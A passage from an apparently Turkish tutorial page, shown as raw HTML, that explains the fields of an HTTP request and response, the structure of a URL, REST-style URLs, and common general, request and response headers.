<span style="background-color: #eeeeee;">Connection: Keep-Alive</span><br />
<span style="background-color: #eeeeee;">Cookie: SessionId=5B70C71F3FD4968935CDB6682E545476</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">———————————</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET</strong> –>Kullanılan HTTP metotu</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/auth/488/YourDetails.ashx?uid=129</strong> –> Sunucudan istenen sayfa</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP/1.1</strong> –>Kullanılan HTTP protokol versiyonu</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept: </strong>Kabul edilebilecek nesne türleri</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Referer: </strong>İsteğin yapılacağı sayfanın url bilgisi</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept-Language: </strong>Sitein dil bilgisi</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">User-Agent:</strong> Tarayıcı bilgisini gösteren değer</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: </strong>Host bilgisi</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">——————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">
HTTP Responses Değerlerinin Anlamı</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP/1.1</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> 200 OK </strong> –> HTTP protokolünün kullanıldığı ve versiyon bilgisi. Ayrıca sunucunun verdiği cevabın rakamsal değeri ile string değeri… İsteğin başarılı olup olmadığı dair.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Date</strong>: <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Tue, 19 Apr 2011 09:23:32 GMT</strong> –>Sunucunun saat-tarih bilgisi</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Server</strong>:<strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> Microsoft-IIS/6.0 –></strong> Sunucu bilgisi</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">X-Powered-By: ASP.NET</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Sitenin hangi dille yazıldığını gösterir.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Set-Cookie</strong>: tracking=tI8rk7joMx44S2Uu85nSWc –> İstemci ile sunucu arasında kurulan bağlantının çerez bilgisi… Site ile kurulan bir sonraki istek için kullanılır.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">X-AspNet-Version: 2.0.50727</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Sitenin yazıldığı dil versiyon bilgisi</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cache-Control: no-cache</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Cache alma olayının olup olmadığını kontrol eder.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Pragma</strong>: no-cache</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Expires: Thu, 01 Jan 1970 00:00:00 GMT –></strong> Çerezlerin yenilenme süresine dair bilgiler…</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Type: text/html; charset=utf-8</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong>Tarayıcıda gösterilen html sayfanın uzantı bilgisi ve dil formatı…</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Length: 1067</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Dönen cevabın body kısmının byte cinsinden değeri….</span><br />
<span style="background-color: #eeeeee;"><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://</span><br />
<span style="background-color: #eeeeee;">www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”><html xmlns=”http://</span><br />
<span style="background-color: #eeeeee;">www.w3.org/1999/xhtml” ><head><title>Your details</title></span><br />
<span style="background-color: #eeeeee;">…</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">—————————————————————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">URL Bilgisi</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">protocol</strong></span>://<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">hostname</strong></span>[:<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">port</strong></span>]/[<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">path</strong></span>/]file[?<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">param</strong></span>=<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">value</strong></span>]</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">protokol:</strong> Kullanılan protokol bilgisi.. http,https,ftp vs.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">hostname:</strong> Ziyaret edilecek sitenin ana dizini</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">port:</strong> Sitenin kullandığı port bilgisi.Genelde 80. port kullanılır. Ama ftp için21,https için 443 kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">path:</strong> Sitenin içerdiği dizinlerin yolu.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">param:</strong> Sitede talep ettiğimiz sayfanın herhangi bir değerine karşılık gelen değişken adı.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">value:</strong> Değişkenin değeri.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #993366; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Örnek</span>:</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #99cc00; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">https://www.fbh.com.tr/eğitim</span><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/web_egitimi.php</span><span style="border: 0px; box-sizing: border-box; color: #333399; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">?sid=12</span></strong></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">————————————————————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">REST Bilgisi</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">Bu URL değerinde talep edilen sayfaya ait parametre bilgileri görünmez.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">Normal URL isteği: <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #99cc00; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">https://www.fbh.com.tr/eğitim</span><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/web_egitimi.php</span><span style="border: 0px; box-sizing: border-box; color: #333399; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">?sid=12&step=egitim</span></strong></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">REST URL değeri: <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #99cc00; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">https://www.fbh.com.tr/eğitim</span><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/web_egitimi.php/</span><span style="border: 0px; box-sizing: border-box; color: #333399; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">12/egitim</span></strong></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">————————————————————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">
HTTP BAŞLIKLARI</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">HTTP protokolünde istek-cevap işlemlerinde kullanılan başlık bilgilerinin anlamları aşağıdaki gibidir.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Genel Başlıklar</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Connection:</strong> İstemci-sunucu arasında HTTP iletimi tamamlandıktan sonra TCP bağlantısının devam edip etmeyeceğine dair bilgidir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Encoding: </strong>Veri iletimini daha hızlı gerçekleştirmek için kullanılan bazı metotların bilgisini tutulduğu türdür.(gzip gibi).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Length: (</strong>HEAD başlığı hariç) Get,Post gibi metotları ile yapılan isteklerin body bilgisinin uzunluk bilgisini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Type: </strong>İletim gövdesinin türünü gösterir.(text/html, text/javascript)</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Transfer-Encoding:</strong> İletilen cevabın mesaj bölümünün veri iletiminde daha hızlı aktarılması için bazı dönüşümlerin yapılmasına olanak sağlayan türdür.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">REQUEST Başlıkları</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept:</strong> İstemcinin kabul edilebileceği tür bilgisini gösterir. Resim formatları,dosya formatları gibi.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept-Encoding:</strong> Sunucunun kabul edebileceği format bilgisini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Authorization: </strong>HTTP kimlik doğrulama türlerini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cookie:</strong> İstemci daha önce kullanılan çerezleri sunucuya yollar.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: </strong>Talep edilen sayfanın bağlı olduğu hostname bilgisini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">If-Modified-Since:</strong> Talep edilen sayfanın en son tarayıcan istenme bilgisidir. Eğer bu talep edilen sayfa sunucuda yoksa 304 kod yapısında cevap dönülür. Arama motorlarıda en son cache aldığı sayfa şeklini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">If-None-Match: </strong>Sunucu tipini belirlemek için kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Origin:</strong> AJAX istelerinde domainin kökeni belirlemek için kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Referer:</strong>Geçerli isteğin URL değerini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">User-Agent: </strong>Tarayıcı bilgilerini gösterir.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">RESPONSE Başlıkları</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Access-Control-Allow-Origin: </span></strong><span style="border: 0px; box-sizing: border-box; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">AJAX isteklerinde kaynak kontrolünde kullanılır.</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cache-Control:</strong> Tarayıcının cache alma yapısının olup olmadığını kontrol eder.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">ETag: </strong> Özel etiketleri gösterir. Sunucunun türünü göstermede de kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Expires: </strong>İletilen cevabın daha ne kadar süre gösterilebileceğini gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Location: </strong>Yönlendirme sayfaları mevcut olduğu durumlarda kullanılır. Sunucu tarafında 3.. ile başlayan cevaplarda kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Pragma: </strong>Ön belleğe alma işlem direktiflerin durumunu gösterir.(no-cache)</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Server: </strong>Sunucuda kullanılan web sunucunun yazılım dili hakkında bilgiyi gösterir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Set-Cookie: </strong>İstemci-sunucu arasındaki çerez bilgisini tutar.Bir sonraki etkileşim için kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
